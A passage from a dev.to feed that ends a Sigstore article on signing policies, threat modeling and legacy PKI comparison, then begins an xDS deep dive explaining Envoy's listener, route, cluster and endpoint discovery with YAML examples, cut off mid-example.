&lt;p&gt;This policy dictates: &lt;strong&gt;"Images under &lt;code&gt;ghcr.io/myorg/&lt;/code&gt; are ONLY allowed to run if they were signed by the build.yml workflow on the main branch via GitHub Actions."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Evaluation logic:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If multiple &lt;code&gt;ClusterImagePolicy&lt;/code&gt; resources match, &lt;strong&gt;all&lt;/strong&gt; of them must be satisfied (AND).&lt;/li&gt;
&lt;li&gt;If a single policy has multiple &lt;code&gt;authorities&lt;/code&gt;, &lt;strong&gt;any one&lt;/strong&gt; of them will satisfy it (OR).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Enforcing SBOM Attestations
&lt;/h3&gt;

&lt;p&gt;The SBOM Attestations we covered previously can also be enforced here. You can write custom policies in CUE or Rego.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;policy.sigstore.dev/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterImagePolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;require-vuln-scan-passed&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;images&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;glob&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ghcr.io/myorg/**"&lt;/span&gt;
  &lt;span class="na"&gt;authorities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;keyless&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;url&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://fulcio.sigstore.dev&lt;/span&gt;
        &lt;span class="na"&gt;identities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;issuer&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://token.actions.githubusercontent.com"&lt;/span&gt;
            &lt;span class="na"&gt;subject&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"&lt;/span&gt;
      &lt;span class="na"&gt;attestations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vuln-scan&lt;/span&gt;
          &lt;span class="na"&gt;predicateType&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://cosign.sigstore.dev/attestation/vuln/v1&lt;/span&gt;
          &lt;span class="na"&gt;policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cue&lt;/span&gt;
            &lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
              &lt;span class="s"&gt;predicateType: "cosign.sigstore.dev/attestation/vuln/v1"&lt;/span&gt;
              &lt;span class="s"&gt;predicate: {&lt;/span&gt;
                &lt;span class="s"&gt;scanner: {&lt;/span&gt;
                  &lt;span class="s"&gt;result: "PASSED"&lt;/span&gt;
                &lt;span class="s"&gt;}&lt;/span&gt;
              &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy creates an ironclad rule: &lt;strong&gt;"Only deploy images that have a cryptographically signed Attestation proving they passed the vulnerability scanner."&lt;/strong&gt; You can literally enforce this at the Kubernetes Admission Webhook level.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Expanding the Ecosystem: Beyond Containers
&lt;/h2&gt;

&lt;p&gt;Sigstore cut its teeth on container images, but as of 2026, its reach has exploded.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PyPI (Python)&lt;/strong&gt;: Sigstore-based attestations hit GA in November 2024. Projects using Trusted Publishing (GitHub Actions OIDC to PyPI) automatically get Sigstore signatures applied with zero workflow changes. Currently, ~5% of the top 360 packages are on board, pumping over 20,000 attestations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;npm (Node.js)&lt;/strong&gt;: Trusted Publishing went GA in July 2025. Publishing via OIDC automatically attaches a Sigstore provenance attestation to the package.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Maven Central (Java)&lt;/strong&gt;: Rolled out native support for Sigstore signatures in January 2025.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rekor Monitor&lt;/strong&gt;: OpenSSF is actively hardening Rekor Monitor for production use. It handles Rekor v2, certificate validation, and TUF integration. We've already seen cases where malicious package releases were caught purely by monitoring Rekor logs.&lt;/p&gt;




&lt;h2&gt;
  
  
  10. Threat Modeling: What Breaks When Things Go Wrong?
&lt;/h2&gt;

&lt;p&gt;Sigstore is a powerhouse, but it's not magic. Here is a breakdown of what happens if its core components get compromised, and the mitigations in place.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Threat&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;th&gt;Mitigation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC Provider Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Rogue ID Tokens mint certs under someone else's identity.&lt;/td&gt;
&lt;td&gt;CT Logs record all certs. Identity owners can spot anomalies by monitoring the logs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fulcio CA Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Attacker mints arbitrary certificates.&lt;/td&gt;
&lt;td&gt;Unlogged certs are rejected by clients. The community monitors CT logs to catch it.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rekor Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Logs altered or fake entries injected.&lt;/td&gt;
&lt;td&gt;Blocked by v2 native Witnessing, Merkle consistency proofs, and signed Root Hashes.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TUF Root Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The entire root of trust is swapped out.&lt;/td&gt;
&lt;td&gt;Requires compromising 3-of-5 hardware keys. Audited via highly public Key Ceremonies.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ephemeral Key Theft&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Attackers forge signatures.&lt;/td&gt;
&lt;td&gt;Keys live in RAM for seconds. Cert dies in 10 minutes. The signature must already be in Rekor.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The brilliance here is that &lt;strong&gt;a single component failure does not cause a systemic collapse.&lt;/strong&gt; If Fulcio goes rogue, the CT Log catches it. If Rekor is compromised, the Witnesses catch it. If the OIDC provider is breached, log monitoring catches it.&lt;/p&gt;




&lt;h2&gt;
  
  
  11. Legacy PKI vs. Sigstore
&lt;/h2&gt;

&lt;p&gt;Let's wrap up by comparing Sigstore against legacy code-signing PKI.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Legacy Code Signing PKI&lt;/th&gt;
&lt;th&gt;Sigstore&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key Management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Hoard keys in HSM/Vault forever.&lt;/td&gt;
&lt;td&gt;Generate ephemerally, wipe instantly. Zero management.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Identity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tied to an organization (costs money, requires corporate entity).&lt;/td&gt;
&lt;td&gt;Tied to your OIDC ID (Google/GitHub, free).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cert Lifespan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Years. Requires complex CRL/OCSP.&lt;/td&gt;
&lt;td&gt;10 minutes. Revocation is obsolete.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cost&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Commercial CAs: $200-$500+/year.&lt;/td&gt;
&lt;td&gt;Free (Public Good Instance).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Transparency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;None. Completely opaque.&lt;/td&gt;
&lt;td&gt;Every signature immortalized in Rekor.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Verification UX&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;You have to manually fetch the signer's public key.&lt;/td&gt;
&lt;td&gt;Just specify the &lt;code&gt;identity&lt;/code&gt; and &lt;code&gt;issuer&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OSS Compatibility&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Terrible. No corporate entity, key distribution nightmare.&lt;/td&gt;
&lt;td&gt;Flawless. Uses developer IDs, perfectly automatable in CI.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Legacy PKI asked, "&lt;strong&gt;Do you trust this specific key?&lt;/strong&gt;" Sigstore fundamentally shifts this to, "&lt;strong&gt;Do you trust this specific identity, at this exact point in time?&lt;/strong&gt;" Transparency logs deliver the temporal proof, and short-lived certificates eradicate the nightmare of key lifecycle management.&lt;/p&gt;




&lt;h2&gt;
  
  
  12. Conclusion
&lt;/h2&gt;

&lt;p&gt;We just tore apart the engine that makes &lt;code&gt;cosign sign&lt;/code&gt; feel like magic.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Fulcio&lt;/strong&gt; verifies your OIDC ID Token and mints a certificate that self-destructs in 10 minutes. It logs everything to a CT Log, meaning CA compromises can't hide.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rekor&lt;/strong&gt; forces every signing event into an immutable Merkle Tree. Inclusion proofs and signed timestamps permanently testify that the signature happened while the cert was alive.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TUF&lt;/strong&gt; defends the root of trust with 3-of-5 threshold signatures and chained verification. Even a hacked CDN can't force-feed you a fake root cert.&lt;/li&gt;
&lt;li&gt;Hook this into the &lt;strong&gt;GitHub Actions OIDC Provider&lt;/strong&gt;, and you get completely automated, headless CI/CD signing.&lt;/li&gt;
&lt;li&gt;Slap down &lt;strong&gt;Policy Controller&lt;/strong&gt; on your cluster, and you establish a hard deployment gate.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;They call Sigstore the "Let's Encrypt of code signing." Just like Let's Encrypt made HTTPS the default, Sigstore is turning ubiquitous code signing into the new standard. The fact that npm, PyPI, and Maven Central are aggressively adopting it proves the momentum is real.&lt;/p&gt;

&lt;p&gt;The next time you hit &lt;code&gt;cosign sign&lt;/code&gt;, take a second to appreciate the insane engineering behind it. Fulcio minting a 10-minute cert, Rekor hashing the log into a Merkle tree, and TUF stubbornly defending the root—all so you can throw your keys into the void.&lt;/p&gt;

</description>
      <category>security</category>
      <category>sigstore</category>
      <category>kubernetes</category>
      <category>devops</category>
    </item>
    <item>
      <title>xDS Deep Dive: Dissecting the "Nervous System" of the Service Mesh</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Mon, 20 Apr 2026 15:40:41 +0000</pubDate>
      <link>https://dev.to/kanywst/xds-deep-dive-dissecting-the-nervous-system-of-the-service-mesh-3m5i</link>
      <guid>https://dev.to/kanywst/xds-deep-dive-dissecting-the-nervous-system-of-the-service-mesh-3m5i</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;I was debugging Istio routing the other day, and honestly, I had a moment where I felt a bit "creeped out."&lt;/p&gt;

&lt;p&gt;You tweak a &lt;code&gt;VirtualService&lt;/code&gt; YAML file, hit &lt;code&gt;kubectl apply&lt;/code&gt;, and within seconds, the routing rules across hundreds of Envoy proxies scattered throughout the cluster switch over perfectly.&lt;/p&gt;

&lt;p&gt;There's no process restart. You aren't running &lt;code&gt;nginx -s reload&lt;/code&gt;. Rolling out configuration changes to thousands of hosts happens in seconds, and &lt;strong&gt;even if you push a completely broken YAML, it magically rolls back to a safe state on its own.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It feels like magic, but naturally, there's an incredibly gritty mechanism running behind the scenes. That mechanism is &lt;strong&gt;xDS (xDiscovery Service)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;You might think of it as just "Envoy's config protocol," but xDS has long escaped Envoy's borders. Today, it's standardized as the &lt;strong&gt;"Universal Data Plane API" (the lingua franca of L4/L7 networking)&lt;/strong&gt; by the CNCF xDS API Working Group, heavily used by gRPC (Proxyless) and Cilium's ztunnel. As of 2026, it is the absolute most important protocol to understand if you want to talk about service mesh.&lt;/p&gt;

&lt;p&gt;We are going to read through this from top to bottom—covering why static configuration is a nightmare, the dependency chain of LDS/RDS/CDS/EDS, and the ACK/NACK rollback mechanism that saves us from outages.&lt;/p&gt;




&lt;h2&gt;
  
  
  0. Prerequisites: Why use an "API" to push configurations?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Envoy and Protocol Buffers
&lt;/h3&gt;

&lt;p&gt;The decisive difference between Envoy and traditional reverse proxies like Nginx or HAProxy is that Envoy was built from the ground up on the premise that &lt;strong&gt;configuration will be injected externally, in real-time, via gRPC.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Envoy doesn't do service discovery on its own. The control plane (like Istio's &lt;code&gt;istiod&lt;/code&gt;) watches Kubernetes &lt;code&gt;Pods&lt;/code&gt; and &lt;code&gt;Services&lt;/code&gt;, translates them into strongly-typed &lt;strong&gt;Protocol Buffers (proto3)&lt;/strong&gt; messages that Envoy understands, and streams them over HTTP/2 gRPC. By using gRPC streaming instead of JSON polling, it achieves incredibly low latency and type safety.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. The Despair of Static Configuration and the Awakening of xDS
&lt;/h2&gt;

&lt;p&gt;If you were to configure Envoy statically, you’d end up writing an &lt;code&gt;envoy.yaml&lt;/code&gt; file like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;static_resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;listeners&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_listener&lt;/span&gt;
    &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;0.0.0.0&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
    &lt;span class="c1"&gt;# ...filter configs...&lt;/span&gt;
  &lt;span class="na"&gt;clusters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_backend&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STRICT_DNS&lt;/span&gt;
    &lt;span class="na"&gt;load_assignment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;cluster_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_backend&lt;/span&gt;
      &lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;lb_endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;10.0.1.15&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the idyllic days when you only had 10 Pods, this was fine. But in today's Kubernetes environments, Pods scale every second, they fluctuate due to HPA, and IPs change constantly as nodes are retired. &lt;strong&gt;Every time a backend IP changes, are you going to rewrite the config files for all proxies and restart their processes?&lt;/strong&gt; That's pure insanity. Connections would drop, latency would spike, and the system would collapse.&lt;/p&gt;

&lt;p&gt;That is exactly why dynamic configuration (xDS) is mandatory.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8gn5jztgse5vpd9h73od.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8gn5jztgse5vpd9h73od.png" alt="dynamic configuration" width="800" height="339"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With xDS, Envoy can seamlessly start routing traffic to new Pod IPs with absolutely zero restarts.&lt;/p&gt;




&lt;h2&gt;
  
  
  2. The Core 5 Discovery Services
&lt;/h2&gt;

&lt;p&gt;The "x" in xDS is a wildcard. The protocol is heavily segmented into five major services (APIs) based on the scope of the configuration.&lt;/p&gt;

&lt;p&gt;These aren't just parallel configuration items—they have &lt;strong&gt;strict dependencies (pointers)&lt;/strong&gt; on one another. Grasping this dependency chain is step one to mastering xDS.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LDS (Listener)&lt;/strong&gt;: Which port should we listen on?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RDS (Route)&lt;/strong&gt;: Which path routes to where?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CDS (Cluster)&lt;/strong&gt;: What are the connection settings for the destination service?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EDS (Endpoint)&lt;/strong&gt;: What are the actual IP addresses of that service?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SDS (Secret)&lt;/strong&gt;: What certificate data (e.g., for TLS termination) do we need?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's look at how they point to each other at the YAML/code level.&lt;/p&gt;

&lt;h3&gt;
  
  
  ① LDS → Pointing to RDS
&lt;/h3&gt;

&lt;p&gt;LDS creates the entry point, defining "Listen for HTTP on port 8080." However, instead of hardcoding IP destinations for the traffic, it embeds a &lt;strong&gt;reference (name) to the RDS&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from LDS (Listener Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_listener&lt;/span&gt;
&lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;0.0.0.0&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;8080&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
&lt;span class="na"&gt;filter_chains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.network.http_connection_manager&lt;/span&gt;
    &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;rds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;route_config_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_routes&lt;/span&gt;  &lt;span class="c1"&gt;# ← [KEY] Refers to RDS resource "my_routes"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ② RDS → Pointing to CDS
&lt;/h3&gt;

&lt;p&gt;RDS is the "signboard." Called up by LDS as &lt;code&gt;my_routes&lt;/code&gt;, this config evaluates HTTP paths or headers and returns &lt;strong&gt;a logical cluster name (a reference to CDS)&lt;/strong&gt;. Istio's &lt;code&gt;VirtualService&lt;/code&gt; gets translated into this layer.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from RDS (Route Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my_routes&lt;/span&gt;
&lt;span class="na"&gt;virtual_hosts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api_host&lt;/span&gt;
  &lt;span class="na"&gt;domains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;api.example.com"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;routes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;match&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;prefix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/v1/"&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;
    &lt;span class="na"&gt;route&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="nv"&gt;api-v1-cluster&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;  &lt;span class="c1"&gt;# ← [KEY] Refers to CDS resource "api-v1-cluster"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ③ CDS → Pointing to EDS
&lt;/h3&gt;

&lt;p&gt;CDS defines the &lt;em&gt;nature&lt;/em&gt; of the designated cluster. It determines the load balancing algorithm (Round Robin, etc.) and circuit breaker thresholds. This is the domain of Istio's &lt;code&gt;DestinationRule&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It still doesn't write down specific IP addresses here; it &lt;strong&gt;delegates the final resolution to EDS&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from CDS (Cluster Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-v1-cluster&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;EDS&lt;/span&gt;                           &lt;span class="c1"&gt;# ← [KEY] Declares we will fetch endpoints dynamically via EDS&lt;/span&gt;
&lt;span class="na"&gt;eds_cluster_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;eds_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{&lt;/span&gt; &lt;span class="nv"&gt;ads&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt; &lt;span class="pi"&gt;}&lt;/span&gt;           &lt;span class="c1"&gt;# (Requests EDS via ADS)&lt;/span&gt;
&lt;span class="na"&gt;lb_policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ROUND_ROBIN&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ④ Touching Down at EDS
&lt;/h3&gt;

&lt;p&gt;Finally, EDS returns the &lt;strong&gt;actual IP addresses of the Pods&lt;/strong&gt; tied to that cluster. Because clusters scale up and down, EDS is the most aggressively updated component in xDS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Data streamed from EDS (Endpoint Discovery Service)&lt;/span&gt;
&lt;span class="na"&gt;cluster_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-v1-cluster&lt;/span&gt;
&lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;lb_endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
